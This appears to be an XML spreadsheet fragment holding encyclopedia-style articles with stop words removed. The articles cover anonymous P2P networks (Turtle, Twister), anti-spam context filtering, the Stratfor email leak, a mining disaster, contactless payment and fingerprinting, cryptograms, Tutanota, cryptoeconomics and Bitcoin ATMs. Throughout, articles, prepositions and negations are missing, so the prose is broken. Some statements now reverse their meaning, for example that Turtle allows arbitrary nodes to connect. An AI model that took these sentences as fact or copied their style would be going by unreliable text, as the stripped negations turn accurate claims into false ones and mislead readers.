    <t>turtle free anonymous peer-to-peer network project developed vrije universiteit amsterdam, involving professor andrew tanenbaum. developed anymore. like anonymous software, allows users share files otherwise communicate without fear legal sanctions censorship. turtle's claims anonymity backed research papers provided "external links" below. architecture technically, turtle friend-to-friend (f2f) network special type peer-to-peer network communication goes friends, friends, ultimate destination. basic idea behind turtle build overlay pre-existing trust relationships among turtle users. each user acts node overlay running copy turtle client software. unlike existing networks, turtle allow arbitrary nodes connect exchange information. instead, user establishes secure authenticated channels limited number nodes controlled trusted people (friends). turtle overlay, queries results move hop; result information exchanged people trust always encrypted. consequently, snooper adversary determine requesting providing information, information given design, turtle network offers number useful security properties, confined damage case node compromise, resilience denial service attacks. also gift internet privacy file sharing retroshare (inspired "turtle hopping" feature) external links turtle homepage (student's project, 2004) petr matejka's master thesis turtle (2004) "safe private data sharing turtle: friends team-up beat system" "turtle: safe private data sharing" usenix 2005 conference turtle also cited article "applied public infrastructure: international workshop: iwap 2005" article "11th international conference parallel distributed systems (icpads'05)</t>
  </si>
  <si>
    <t>Context filtering</t>
  </si>
  <si>
    <t>context filtering anti-spam mail policy method deal contents mail rather uses context smtp connection decide whether mail accepted not. this method usually prevents reception e-mail first place; thus, common anti-spam features like quarantine, redirect delete applied. this method also distorts statistics anti-spam programs usually unknown many mails (spam otherwise) would received certain connection. filtering context includes methods like dnsbl lookups, domain blacklists, etc. this method extremely rate false positives false negatives. plus side, method usually saving bandwidth server utilization. common context filter dnsbl filtering. efficiency method depends blacklist used. high volume mail sites, recommended local copies dnsbls choice fill zone transfers. this reduces permanent traffic external lookups. some dnsbls also allow certain amount queries every address keep expenses bandwidth low. also domain-based message authentication, reporting conformance (dmarc) email authentication vouch reference</t>
  </si>
  <si>
    <t>2012–13 Stratfor email leak</t>
  </si>
  <si>
    <t>2012–13 stratfor email leak public disclosure number internal emails geopolitical intelligence company stratfor's employees clients, referred wikileaks global intelligence files. e-mails began appearing wikileaks february 2012, 5,543,061 emails published july 2014.stratfor security group based austin, texas. december 2011, hackers took control stratfor's website released list names, credit card numbers, passwords, home email addresses. those listed affiliated organizations bank america, united states department defense, médecins sans frontières, lockheed martin, alamos national laboratory, united nations. hackers included jeremy hammond, worked anonymous release stratfor's emails wikileaks. emails revealed stratfor's surveillance groups occupy wall street protestors bhopal disaster.the e-mails claim include client information, notes stratfor employees internal procedural documentation securing intelligence data. these communications date july 2004 december 2011. wikileaks said obtained e-mails hacker group anonymous, broke stratfor's computer network 2011. initial announcement, wikileaks stated opened database emails dozen media organizations operating several countries, including mcclatchy company, l'espresso, repubblica, ard, russia reporter, rolling stone, along "sneak preview" men. email content first items released email containing glossary titled "the stratfor glossary useful, baffling strange intelligence terms", contained concise sometimes humorously candid definitions, along pointed assessments u.s. intelligence enforcement. glossary included items "background checks" help "run clients’ bill makes appear busy" "briefs" customers need "make sh*t smell good". julian assange julian assange frequent topic discussion emails stratfor staff period 2010–2012. emails fred burton, stratfor's vice-president counterterrorism corporate security former deputy chief counterterrorism division diplomatic security service, indicated knew january 2011 united states government secret indictment assange. stratfor emails gave suggested strategy dealing assange: "move country country face various charges next years" "[bankrupt] asshole first ruin life. give 7-12 years conspiracy". published email burton allegedly wrote "assange going make nice bride prison. screw terrorist. he'll eating food forever." another leaked email, stratfor employee wanted assange waterboarded. governmental emails show stratfor contracts homeland security. mark levine, professor history university california, irvine, described "troubling" homeland security coordinated police attacks occupy movement.an email involving stratfor analyst stated determined officials pakistan's inter-services intelligence (isi) agency knew osama bin-laden's safe house.ynetnews reported that, according internal emails stratfor employees, israel russia engaged exchange information 2008. israel gave russia "'data link codes' unmanned aerial vehicles jewish state sold georgia" russia gave "the codes tor-m1 missile defense systems russia sold iran". emails also stated that, 2008 south ossetia war, georgia "realized uavs compromised looking replacement israeli made drones".international business times reported stratfor found several central european countries, especially czech republic, petitioning nato missile defenses f-16s russia. czech republic, according unknown stratfor source, stated that, talks fail, breaking ties nato general.business insider reported israeli prime minister benjamin netanyahu intelligence source stratfor 2007 2010. emails, fred burton discussed personal communications netanyahu. burton stated email netanyahu informed success consolidating power within likud party ahead regaining position prime minister, shared thoughts regarding distrust president barack obama, threatened assassination hezbollah leader hasan nasrallah, declared intentions unilaterally start iran.al akhbar, citing internal emails stratfor hack, reported former blackwater director james smith relationship stratfor time considered major sources. emails indicate stratfor receiving information venezuelan president hugo chavez' medical condition israeli intelligence source. companies multinational corporations statfor obtain intelligence critics. chemical, lockheed martin, northrop grumman, raytheon coca-cola used stratfor's services.the times india reported emails indicate stratfor hired chemical activists seeking compensation bhopal disaster. chemical company responded written statement read: "major companies often required take appropriate action protect people safeguard facilities," broken laws.the released emails indicated coca-cola paid stratfor determine extent us-based peta supporters travel canada support activism" 2010 olympics. coca-cola company responded emails statement saying "consider prudent monitor protest activities major event sponsor". stratfor offered services bank america investigate journalist glenn greenwald. other stratfor received information informant occupy austin, working undercover operative texas department public safety. responses official response around midnight february stratfor released statement saying "the release stolen emails attempt silence intimidate it." also dismissed rumors founder george friedman's resignation.stratfor stated leaked emails "may forged altered include inaccuracies; authentic", provided evidence tampering. they stated emails represented candid internal language would probably ripe misinterpretation. other responses wikileaks founder julian assange told reuters concerns stratfor stem private intelligence firm relying informants government agencies dubious reputations, u.s. abroad, especially monitoring activist organizations. also called company "shadow cia" stated emails would "reveal stratfor's informers, payoff structure, payment-laundering techniques psychological methods." also accused stratfor making investments based intelligence obtained.former director bobby inman stated leak would damaging stratfor's business. previously stated stratfor competent, delivering high-quality intelligence analyses.max fisher, associate director atlantic, argued stratfor poor reputation "among foreign policy writers, analysts, practitioners" result anonymous wikileaks exaggerated significance information released. also suggested assange targeted relatively unimportant firm over-hyped results order "regain former glory". australian broadcasting corporation foreign correspondent stratfor subscriber mark corcoran also wrote e-mails showed stratfor's methods used gather information similar employed journalists, though wrote quality reports often inferior news reports. references external links global intelligence files wikileaks</t>
  </si>
  <si>
    <t>Twin Shaft disaster</t>
  </si>
  <si>
    <t>twin shaft disaster occurred newton coal company's twin shaft colliery pittston, pennsylvania, united states, june 1896, massive cave-in killed fifty-eight miners. disaster 3:00 morning sunday, june 1896, ninety miners work vein newton coal company's twin shaft mine pittston roof quickly caved believed time perished. concussion explosion great heard miles around. foundation nearly every building pittston shaken windows doors rattled tornado. houses nearer mine, persons thrown beds, thinking earthquake occurred. immediately boom, colliery whistle town fire alarms sounded. families mine works. newspapers reported "havoc everywhere," grief-stricken wives frantic efforts impenetrable tunnels collapsed rock crushed timbers. rescue tunnels attempted, though volunteers sometimes removed feet day. hope faded victims disaster, irish lithuanian immigrants. their names compiled later list working also underground. there boys died cave-in, buried feet (132 ground. wake, left widows orphans. none bodies ever recovered. largest coal mining disasters pennsylvania history (even larger knox mine disaster many decades later nearby port griffith). aftermath july 1896, testimony began formal investigation ordered pennsylvania's governor hastings learn disaster happened, whether mining laws obeyed, might prevent future tragedies. testimony revealed audible "squeezing" pillars weeks prior accident sure sign wall shaft crumble. edward hughes defied boss left shift early night disaster "the crackling grew worse." superintendent ordered extra props provide additional support. apparently, however, props placed strategically section wall gave way, others collapsed like deck cards. total, acres caved investigating committee suggested pillars coal left standing safety "robbed" coal, especially seams mined once, maps mine workings tunnels provided mine inspectors. rescue operations twin shaft slowed absence maps. governor's investigative commission first issued safety recommendations september 1896. these recommendations would often ignored subsequent years. disaster played major role 1900 stronger unionization northeastern pennsylvania leadership john mitchell. today marker stands area event occurred. also avondale mine disaster references</t>
  </si>
  <si>
    <t>Contactless payment</t>
  </si>
  <si>
    <t>contactless payment systems credit cards debit cards, fobs, smart cards, devices, including smartphones mobile devices, radio-frequency identification (rfid) near-field communication (nfc, e.g. samsung pay, apple pay, google pay, fitbit pay, bank mobile application supports contactless) making secure payments. embedded integrated circuit chip antenna enable consumers wave card, fob, handheld device reader point sale terminal. contactless payments made close physical proximity, unlike types mobile payments broad-area cellular wifi networks involve close physical proximity. common standard used major credit card smartphone companies general commerce. contactless smart cards function stored-value cards becoming popular transit system farecards, oyster card riocard. these often store non-currency value (such monthly passes), additional fare value purchased cash electronic payment. tokenisation newer concept encapsulating card issuers details within hardware device application apple iphones. some suppliers claim transactions almost twice fast conventional cash, credit, debit card purchase. because signature verification typically required, contactless purchases usually limited small value sales. lack authentication provides window fraudulent purchases made card owner unaware card's loss. major financial institutions multinational corporations offer contactless payment systems customers contactless credit cards become widespread u.s., u.k., japan, germany, canada, australia, france, netherlands, etc., consumers likely spend money using cards ease small transactions. with contactless cards growing numbers percentages adoption, number payments method increased significantly since spending limit raised. purchases made card surpass made cash account approximately one-third card transactions countries like contactless payments specifically become increasingly popular, accounting point-of-sale purchases australia 2019. card issuers indicate increase availability contactless cards consumers. there million contactless-enabled cards 147,000 terminals alone, visa estimated would million contactless cards issued 2020, predicted million 2019. history 1990s—2000s mobil notable early adopters similar technology, offered "speedpass" contactless payment system participating mobil stations early 1997. although mobil since merged exxon, service still offered many exxonmobil's stations. freedompay also early wins contactless space bank america mcdonald's.in 2002, philips teamed sony elaborate standard. then philips semiconductors applied fundamental patents nfc, invented austrian french engineers franz amtmann philippe maugars received european inventor award 2015.in july 2004, sony, implemented contactless rfid smart card felica japan, introduced osaifu-keitai (おサイフケータイ) system (literal translation: "wallet-phone") developed mobile phone operator docomo multiple felica systems and, january 2006, mobile suica used primarily railway networks owned east.in 2005, experimentation netherlands, contactless deferred payment month, registration trips aboard contactless mobile phone client's account, first experimented germany months tramways hanau nokia 3220 using standard philips sony.in october 2005, immediate contactless payment first experimented france caen months samsung smartphone orange collaboration philips semiconductors cofinoga shops (galeries lafayette, monoprix) vinci parkings. first time, thanks "fly tag", system allowed receive well audiovisual informations, like timetables cinema trailers concerned services. june 2007, payment contactless bank card tested fnac défense paris november 2007 2009 shops caen strasbourg, time smartphones nfc, provided four operators (orange, bouygues telecom, mobile). november 2007, orange transport societies sncf keolis associated months experimentation smartphones rennes metro, trains.the first contactless cards issued barclaycard september 2007. paypass trialed world's first nfc-enabled phone, nokia 6131 nfc, york 2007.in march 2008, became first restaurant chain adopt contactless.on january 2009, used transports first time world china unicom yucheng transportation card changhong dg28 mobile phones tramways chongqing china. 2010s january 2010, barclaycard partnered mobile phone firm orange, launch contactless credit card orange barclaycard also announced 2009 would launching mobile phone contactless technology.after test conducted october 2005 november 2006 users, 2010, transport authority nice régie lignes d'azur first public transport provider europe definitely offer contactless payment tramways network either bank card smartphone application notably samsung player (with mobile phone operators caen strasbourg 2007), well validation aboard transport titles loading titles onto smartphone, addition season tickets contactless card. this service well experimented respectively implemented smartphones june 2013 tramways caen strasbourg., contactless payment display parking machines strasbourg made available october 2011. paris transport network, months testing november 2006 bouygues telecom persons finally 8,000 users july 2018, contactless mobile payment direct validation turnstile readers smartphone adopted september 2019 collaboration societies orange, samsung, wizway solutions, worldline conduent. used seoul introduction korea discount retailer homeplus march 2010 tokyo tested adopted added existing systems, like mobile wallet osaifu-keitai, 2010 2012. standard implemented first time metro network, china unicom beijing december 2010.in october 2011, first mobile phones mastercard paypass and/or visa paywave certification appeared. paypass paywave account assigned embedded secure element and/or card within phones. october 2013, citi enterprise payments hong kong, mobile operation hutchison telecommunications hong kong holdings limited (sehk: 215), jointly announced launch citi wallet.’ using near field communication (nfc) technology, citi wallet' multi-purpose mobile wallet service included mobile payment, transaction history, location-based special offer service search function directed customers best deals within vicinity. 3citi wallet compatible wide range designated smartphones, samsung, sony, htc, iphone. over 9,000 visa paywave readers across hong kong able accept contactless payments 1.in february 2014, mastercard announced would partner weve, joint venture telefónica vodafone focus mobile payments. partnership promote development "contactless mobile payment systems" creating universal platform europe it.on september 2014, apple inc. announced apple pay, proprietary form contactless payment integrated smartphones, release iphone 6.in september 2014, transport london's tube began accepting contactless payment. claiming pushed banking industry develop contactless system. programme secrets london underground series episode (around minute 58).the number completed contactless journeys exceeded 300m. friday december, busiest single 2015, record 1.24m journeys completed 500k unique contactless cards.in 2016 erste group launched nfc-only debit card implemented sticker austria. used supporting terminal transactions unlimited amount however transactions floor limit required confirm transaction.in 2016, contactless payments start become even broader wearable technology devices also offering payment feature. 2020s during covid-19 pandemic, several banks raised contactless payment limits. united kingdom, limit increased march 2020. contactless payments recommended safer payment method compared chip card payments cash transactions. adoption usage google application devices running google's android allows users make purchases using nfc, initially required physical secure element replaced host card emulation introduced android (kitkat). softcard (formerly known isis mobile wallet), cityzi quick wallets example, secure card store encrypted personal information. contactless payments enabled mobile phones still occur small scale, every month increasing number mobile phones certified.in 2012, mastercard advisors wrote consumers likely spend money using cards ease small transactions. mastercard canada says seen "about percent" higher spending users mastercard contactless-brand rfid credit cards.as december 2014, approximately million contactless-enabled cards 147,000 terminals use. june 2017 purchases made card surpassed made cash. this reported driven rise contactless payments, accounted approximately third card transactions number payments method increased significantly since spending limit raised £30. 2018, contactless payments made around transactions uk.in 2018, westpac banking corporation australia revealed contactless payment statistics 2017 claimed report contactless payments approached saturation point used purchases. australian st.george bank reported 94.6% usage period.recent statements visa card issuers indicate increase availability contactless cards consumers near future. visa estimates million contactless cards issued 2020, predicted million 2019 announced 2018 earnings call.telecom operators starting involved contactless payments nfc-enabled phones. belgacom's pingping, example, stored value account partnership alcatel-lucent's touchatag provides contactless payment functionalities. major financial entities offering contactless payment systems include mastercard, china unionpay, citibank, jpmorgan chase, american express, keybank, barclays, barclaycard, hsbc, lloyds banking group, freedompay, co-operative bank, nationwide building society natwest group. visa paywave, american express expresspay, mastercard contactless examples contactless credit cards become widespread u.s. u.k. technology there main standard usages contactless payments adopted throughout payment terminals standard. chip issued bank cards smart chip cryptographic chip placed card known smart card allows wireless payments made chip range payment terminal using rfid technology following emvco standard. when smart card tapped payment terminal authenticates card issuer's details series interactions payment interaction succeed. tokenisation newer approach smart card technology achieved linking smart card hardware device, apple application iphone mobile phone, thereby allowing mobile devices ability make payments using rfid technology payment terminal behalf smart card using token generated card issuer, process known tokenisation. device account number (dan) similar private account number (pan) traditional payment stripe chip cards, generated along private sent card issuer initial setup smart card hardware device. when payments made respective approved application hardware device relevant details expiry date sent card issuer payment terminal cryptography associated private used authorise transaction. security 2006 security researchers found cardholder's name, credit card number, expiration date transmitted contactless payment cards without encryption. they able information leaked contactless credit card make purchase online, without opening envelope card sent.depending economic space, payment limit single transactions without need input pin, contactless cards used certain number times customers asked pin. contactless debit credit transactions chip network older cards protected fraud guarantees. where supported, contactless part card remain non-functional standard chip transaction executed. this provides verification card delivered actual cardholder. under fraud guarantee standards, u.s. banks liable fraudulent transactions charged contactless cards. limit because signature verification typically required, contactless purchases often limited maximum amount transaction, known cardholder verification limit (cvm limit). limits vary banks. transactions defined limit verification usually required (e.g. pin, signature biometric authentication). additionally, lower value transactions accepted without sending transaction online verification acquiring host. this known floor limit. note limits typically apply cdcvm verification (such apple pay) used. also references external links comprehensive technical overview contactless contactless.info, archived original april 2014 designed provide information retailers interest contactless card acceptance] credit cards pose security problem, news chase's "blink" uses rfid</t>
  </si>
  <si>
    <t>Contactless fingerprinting</t>
  </si>
  <si>
    <t>contactless fingerprinting technology (cfp) described government-funded report attempt gather fingerprints gathered wet-ink process then, "touchless" scan, verify claimed identify and, bigger challenge, identify owners without additional clues. although early source technology, worked phone cameras (and needing additional hardware), opened 2003 closed 2011, others space still, several years later, using words "one first."contactless fingerprint technology third generation: wet-ink followed option "optics-based light reflected tops fingerprints plate."as 2017, "face recognition technologies whole general less accurate fingerprinting.": p.15 aging, variations pose problems illumination caused former "higher error rates." history lasers detect fingerprints already existed 1980s method identifying fingerprints could detected conventional techniques, like dusting. public/private contactless study 30-page white paper titled "risks opportunities contactless biometrics" identified "spoofing serious limitation, ranks people know (password, challenge question) (keycard, identify "token") higher biometrics. although ranks facial recognition iris recognition ahead contactless fingerprint identification, fingerprint ranks highest three high-security situations. whitepaper noted canadian border services agency planning utilize combination facial recognition fingerprints.: experiment used assist: using flight manifests compare faces passport photos listed. pending court case defined failures even "high risk" results denials government benefits.: p.11 report 56-page report titled "contactless fingerprint technologies assessment" funded 2010, version report "made available" 2014 online even though "has published."after describing projects various stages incompleteness, identifies four "contactless fingerprint existing products." first company's product attaches designed indoor only." second company footnoted "closed business." third product scans person's fingerprints encodes small object person present; verification takes "approximately seconds." objective speed access restricted, high traffic areas." also, unlike first product, could operate "distance meters" "optimum focal length approximately three inches camera." another limitiation works finger person. fourth product advanced group, touchless, contact scanner, "optical scanning area."a list nine "contactless fingerprint technologies worth noting" part report. three, first closed 2011. next come pair inventor entries; employees worldwide when, reasons mismanagement, went bankrupt absorbed another firm. applications aside border, airport access control, contactless fingerprint technologies provided benefits microfinance benefit poor: india's unbanked difficulty qualifying government united nations microfinance services lack acceptable documentation. with software-only fingerprint scanner phone carried government worker), simple loans "$100 seeds need plant crops" enabled, beginning 2000s.this technology also opened rural areas many unbanked underbanked residents. convenience: paying goods services swipe finger biometric sensor mobil phone security: software downloaded "nearly mobile phone camera" authenticate fingerprints. research 2012 technology review fingerprint identification citations three regarding contactless/touchless research. 2017 nist designed effectively members public could contactless fingerprint device simulated airport situation found half participants could successfully validate fingerprints first try. study added training video, improved results. report considered "encouraging employment touchless finerprint technology." references external links idemia.com: certifies morphowave desktop fingerprint scanner</t>
  </si>
  <si>
    <t>Twister (software)</t>
  </si>
  <si>
    <t>twister experimental peer-to-peer microblogging program. decentralized; consequently cannot shut attack single point attack. system uses end-to-end encryption safeguard communications. based bittorrent- bitcoin-like protocols likened distributed version twitter.in 2020 author miguel freitas posted would leading twister development foreseeable future, although twister network continued running, suggested others might wish fork project. said site might offline hosting expire. twister core version 0.9.40 since 2018. twister remained github. overview twister twitter-like microblogging platform utilizes blockchain technology bitcoin, file exchange method bittorrent, based technologies. website seobloggingpro.com ranked twister number microblogging site, seosandwitch.com ranked twister number microblogging site. case twister, ranking website itself, exists primarily facilitate downloads twister platform.) 2014 twister experimental software alpha phase, implemented distributed file sharing system. user registration authentication provided bitcoin-like network, completely distributed depend central authority. distribution posts uses kademlia distributed hash table (dht) network bittorrent-like swarms, provided libtorrent. included versions bitcoin libtorrent highly patched, intentionally interoperable already existing networks. miguel freitas, aiming build censor-resistant public posting platform, began development twister july 2013 address concerns free speech privacy. building work bitcoin bittorrent, built core structure october 2013. lucas leal hired create html user interface, miguel writing required javascript code. 2,500 user accounts registered first days operation.as completely decentralized network, twister cannot incapacitated since unique point attack system. twister uses end-to-end encryption protect communications. twister designed prevent users knowing user's localization, address, user following. users publish public messages microblogging platforms, direct messages private messages users protected unauthorised access. history brazilian computer engineer programmer miguel freitas started developing social network learning massive programs usa's national security agency (nsa), revealed whistleblower edward snowden. started worry accessibility amount information control single company american jurisdiction. according freitas, twitter social network prominent promoting democracy organizing protests. freitas built twister using privacy-preserving technology risks involved providing personal information social networks light mass surveillance conducted nsa. freitas developer, leal, built alpha version application android, linux versions windows iphone planned, open source anyone create alternative operating system versions application. while project alpha phase brian armstrong, co-founder coinbase, believed great example open protocol bitcoin used diverse purposes. technology protocols twister distributed system, works peer-to-peer program. unlike decentralized networks (like pump.io/identi.ca, statusnet/gnu social diaspora), require user server require user trust third-party server order bitcoin this achieved bitcoin protocol, though network used cryptocurrency. protocol handles registration users. miners verify transactions bitcoin network combat double spending, twister network verifies users' names message posted specific user really user. bittorrent messages driven bittorrent protocol. this allows distribution system great number messages along network fast efficient way; also, allows users receive notifications almost instantly messages alerts without need central server. since twister uses end-to-end encryption, intercepted, private direct messages cannot read person apart addressee. code used elliptic curve cryptography (different used nsa) used bitcoin. thought give security level similar code 3072 bits. data stored anywhere, cannot used cut. consequence, user loses entry password, impossible access private messages. because peer-to-peer system, central server publications compiled (see prism). freitas explains, system designed users cannot know online, address, messages read. this information registered anywhere. despite this, freitas warns users total anonymity possible depending circumstances. platforms twister developed linux environment, migrated successfully android long-term objectives program move whole cryptographic code implementation interface user browser. this way, users would capable accessing twister client platform use, choosing third-party server still maintaining security private passwords times. functionality first twister prototype intended reproduce basic characteristics microblogging platform, including: searching users profiles navigation follow/unfollow sending text messages limited characters broadcasting answering messages browsing mailing routes, mentions, hashtags direct messages (private)private messages require addressee following speaker, common requisite existing platforms. some characteristics difficult implement completely decentralized system, requiring effort. this includes arbitrary register words posts recompilation hashtags find main tendencies. security twister uses parameters elliptic curves bitcoin: secp256k1. this curve implicated nsa, called sec256r1. bits public-key cryptography, must proportionate security similar 3072 bits least said experts) they usually stimulate people break security systems something everyone desires, money. there millions table, coded keys secp256k1 bitcoin. direct application messages encoding based example code published internet ladar levison lavabit. known ladar took service denied cooperating government allows control clients. decentralized twister peer-to-peer microblogging platform communication established computers without going central node. censored people node delete user's posts dht, block user's account. completely private fact messages sent directly user user encrypted way, messages travel private black-box, directions protected. anonymity application, address recorded time, avoids tracked entity company. according freitas, guarantees anonymity mean address detected (internet service provider); rather, means content message visible except someone decrypt breaking algorithms. order 100% anonymous, user would browser masks address, similar. references external links official website community building better twitter: study twitter alternatives social, quitter, rstat.us, twister</t>
  </si>
  <si>
    <t>Cryptogram</t>
  </si>
  <si>
    <t>cryptogram type puzzle consists short piece encrypted text. generally cipher used encrypt text simple enough cryptogram solved hand. substitution ciphers letter replaced different letter number frequently used. solve puzzle, must recover original lettering. though used serious applications, mainly printed entertainment newspapers magazines. other types classical ciphers sometimes used create cryptograms. example book cipher book article used encrypt message. history cryptograms ciphers used cryptograms originally created entertainment purposes, real encryption military personal secrets.the first cryptogram entertainment purposes occurred middle ages monks spare time intellectual games. manuscript found bamberg states irish visitors court merfyn frych gwriad (died 844), king gwynedd wales given cryptogram could solved transposing letters latin greek. around thirteenth century, english monk roger bacon wrote book listed seven cipher methods, stated crazy writes secret conceal vulgar." 19th century edgar allan helped popularize cryptograms many newspaper magazine articles.well-known examples cryptograms contemporary culture syndicated newspaper puzzles cryptoquip cryptoquote, king features.in public challenge, writer j.m. appel announced september 2014, table contents page short story collection, scouting reaper, also doubled cryptogram, pledged award first solve solving cryptogram cryptograms based substitution ciphers often solved frequency analysis recognizing letter patterns words, letter words, which, english, (and sometimes "o"). double letters, apostrophes, fact letter substitute cipher also offer clues solution. occasionally, cryptogram puzzle makers start solver letters. other crypto puzzles while cryptogram remained popular, time puzzles similar emerged. cryptoquote, famous quote encrypted cryptogram. recent version, biblical twist, codedword. this puzzle makes solution available online provides short exegesis biblical text. third cryptoquiz. this puzzle starts category (unencrypted). example, "flowers" might used. below list encrypted words related stated category. person must solve entire list finish puzzle. another type involves using numbers relate texting solve puzzle. zodiac killer sent four cryptograms police still active. despite much research many investigations, translated, help identifying serial killer. also list famous ciphertexts musical cryptogram american cryptogram association verbal arithmetic references</t>
  </si>
  <si>
    <t>Tutanota</t>
  </si>
  <si>
    <t>tutanota end-to-end encrypted email freemium secure email service. service advertisement-free; relies donations premium subscriptions. march 2017, tutanota's owners claimed million users product. history tutanota derived latin contains words "tuta" "nota" means "secure message". tutao gmbh founded 2011 hannover, germany.the goal developers tutanota fight email privacy. their vision gained even importance, edward snowden revealed nsa's mass surveillance programs like xkeyscore july 2013.since 2014, software open-sourced reviewed outsiders github.in august 2018, tutanota became first email service provider release f-droid, removing dependence proprietary code. this part full remake app, removed dependence notifications replacing sse. also enabled search, reworked user interface.in november 2020, cologne court ordered monitoring single tutanota account used extortion attempt. monitoring function apply future unencrypted emails account receives affect emails previously received. encryption tutanota offers end-to-end encryption emails sent tutanota user another. tutanota also encrypts emails contacts stored servers, "except email addresses users well senders recipients emails" "date email sent received". emails sent non-encrypted, encrypted tutanona user tutanota servers, sent unencrypted destination user.tutanota uses standardized, hybrid method consisting symmetrical asymmetrical algorithm length 2048 bit. external recipients tutanota notification sent link temporary tutanota account. after entering previously exchanged password, recipient read message reply end-to-end encrypted. account deletion tutanota deletes free accounts logged months. censorship tutanota blocked egypt since october 2019, blocked russia since february 2020 unknown reasons (although believed tied recent actions services operating outside country, especially involve encrypted communications).though tutanota blocked countries, users still access service vpn. also comparison mail servers comparison webmail providers references external links official website</t>
  </si>
  <si>
    <t>Cryptoeconomics</t>
  </si>
  <si>
    <t>cryptoeconomics evolving economic paradigm cross-disciplinary approach study digital economies decentralized finance (defi) applications. cryptoeconomics integrates concepts principles traditional economics, cryptography, computer science, mathematical game theory disciplines. just traditional economics provides theoretical foundation traditional financial (a.k.a., centralized finance cefi) services, cryptoeconomics provides theoretical foundation defi services bought sold fiat cryptocurrencies, legally bound smart contracts. definitions goals term cryptoeconomics coined ethereum community formative years (2014-2015), initially inspired application economic incentives original bitcoin protocol 2008. although phrase typically attributed vitalik buterin, earliest public documented usage 2015 talk vlad zamfir entitled “what cryptoeconomics?”. zamfir's view cryptoeconomics relatively broad academic: "... formal discipline studies protocols govern production, distribution, consumption goods services decentralized digital economy. cryptoeconomics practical science focuses design characterization protocols". alternatively, 2017 talk, buterin's view narrow pragmatic: “... methodology building systems guarantee certain kinds information security properties".the primary goals cryptoeconomics understand fund, design, develop, facilitate operations decentralized finance (defi) systems, apply economic incentives penalties regulate distribution goods services emerging digital economies. concepts principles economics applies cryptoeconomics well traditional economics.|alt=graph depicting quantity x-axis price y-axis]] cryptoeconomics considered evolution digital economics, turn evolved traditional economics (commonly divided microeconomics macroeconomics). consequently, traditional economic concepts regarding production, distribution, consumption goods services also apply cryptoeconomics. example, include adam smith's three basic laws economics: supply demand, self interest, competition. they also include modern economic concepts, fiat money theory modern monetary theory (mmt). cryptography cryptography practice study secure communication techniques presence adversarial behavior. more specifically, cryptography concerned creating analyzing protocols prevent third parties reading private messages, addresses various detailed aspects information security, data confidentiality, integrity, authentication, non-repudiation. cryptographic techniques essential ensure defi electronic commerce transactions secure generally irreversible. these cryptographic techniques include: asymmetric (private key) encryption end-to-end encryption (e2ee) zero knowledge proofs (zkp) computer science computer science, study practice computation, automation, information, essential ensure defi electronic commerce transactions distributed decentralized. computer science techniques applied cryptoeconomics include: peer-to-peer (p2p) network architecture distributed ledger technologies (blockchains, directed acyclic graphs [dags], hashgraphs) digital signatures mathematical game theory game theory uses mathematical models study rational human decision-making within interactive, dynamic environments. game theory proven fundamental development cryptocurrencies blockchains underlie cryptoeconomics, reasons bitcoin blockchain compromised decade since creation, despite numerous attempts. notable mathematical game theory models applied cryptoeconomics include: prisoner's dilemma byzantine generals problem markov decision process history historical roots cryptoeconomics traced rise altcoins (alternative cryptocurrency coins), prominent among ethereum project, 2015 pioneered integration turing-complete (computationally complete) smart contracts blockchain, thereby enabling wide range decentralized finance (defi) applications. cryptoeconomic subdisciplines similar traditional economics divided macroeconomics (regional, national, international economics) microeconomics (individual enterprise economics) subdisciplines, cryptoeconomics divided crypto-macreconomics crypto-microeconomics subdisciplines. crypto-macroeconomics crypto-macroeconomics concerned regional, national, international regulation cryptocurrencies defi transactions. group seven (g7) governments' interest cryptocurrencies became evident august 2014, united kingdom (uk) treasury commissioned study cryptocurrencies potential role economy, issued final report january 2021. june 2021, salvador became first country accept bitcoin legal tender. august 2021, cuba followed legal resolution recognize regulate cryptocurrencies bitcoin. however, september 2021, government china, single largest market cryptocurrency, declared cryptocurrency transactions illegal, completing crackdown cryptocurrency previously banned operation intermediaries miners within china. crypto-microeconomics crypto-microeconomics concerned individual enterprise usages cryptocurrencies defi transactions. strong majority adults heard major cryptocurrencies (bitcoin, ether), personally invested traded, otherwise used one. more million people cryptocurrency worldwide, approximately million americans invested bitcoin. criticisms controversies bitcoin, along cryptocurrencies, described economic bubble many distinguished economists, including robert shiller, joseph stiglitz, richard thaler, paul krugman, nouriel roubini. addition, bitcoin cryptocurrencies criticized amount electricity required cryptocurrency "mining" (blockchain transaction validation), purchase illegal goods. also cryptography decentralized finance (defi) digital economy distributed ledger technology (dlt) external links cryptecon works information portal cryptoeconomics wikiversity cryptoeconomics references further reading chris berg, sinclair davidson, jason potts. understanding blockchain economy: introduction institutional cryptoeconomics. edward elgar publishing, 2019. jian gong, cryptoeconomics: igniting blockchain. press, 2020.</t>
  </si>
  <si>
    <t>Bitcoin ATM</t>
  </si>
  <si>
    <t>bitcoin atms (automated teller machine) kiosks allows person purchase bitcoin cryptocurrencies using cash debit card. some bitcoin atms offer bi-directional functionality enabling purchase bitcoin well sale bitcoin cash. cases, bitcoin providers require users existing account transact machine. there main types bitcoin machines: unidirectional (one-way) bidirectional (two-way). only crypto atms worldwide bidirectional, less u.s. both types connected internet, allowing cash purchase and/or sale bitcoin. some machines paper receipt others move money public blockchain. bitcoin cash kiosks look like traditional atms, connect bank account instead connect user directly bitcoin wallet exchange. while bitcoin atms traditional atms revamped software, always require bank account debit card. average, transaction fees 10-20% high 6.5%. history october 2013, robocoin machine opened waves coffee shop downtown vancouver, canada. this machine understood world's first publicly available bitcoin atm. robocoin ceased operations 2015. december 2013, europe's first bitcoin installed bratislava, slovakia. first machine united states went online february 2014, cigar albuquerque, mexico, though removed days later. months later, 2014, first licensed bitcoin u.s. developed coinme installed spitfire grill seattle canada 2014, canada first country approve regulation cryptocurrencies, although took time enforce. february 2014, finance minister mentioned plans introduce anti-money laundering anti-terrorist financing regulations virtual currencies bitcoin. june year, governor general approved amendment bill c-31 would treat cryptocurrency businesses money services businesses (msbs), department finance circulated draft proposed regulations june 2018. july 2020, businesses dealing virtual currencies considered msbs financial transactions reports analysis centre canada.in 2018, canada revenue agency (cra) commissioned investigation bitcoin atms find laws followed users. from december 2017 february 2018, number bitcoin atms canada increased 20%. june 2019, vancouver considering machines money-laundering concerns.as february 2022, localcoin, canadian bitcoin provider currently largest footprint bitcoin atms canada, according coin radar.bitcoin well based edmonton became first publicly traded bitcoin company july 2021. united states according coin radar, 24,700 bitcoin atms september 2021, 2,342 2018. small shop owners earning reported $300 month rental space. 2021, number crypto atms grown vastly 38,000. transactions fees vary depending company operating machine. some operators charge fees high others charge 6.99%. some bitcoin atms operating imported countries; example, czech company general bytes sold thousands machines operators operating through coinme, bitcoin exchanged united states local currency atms 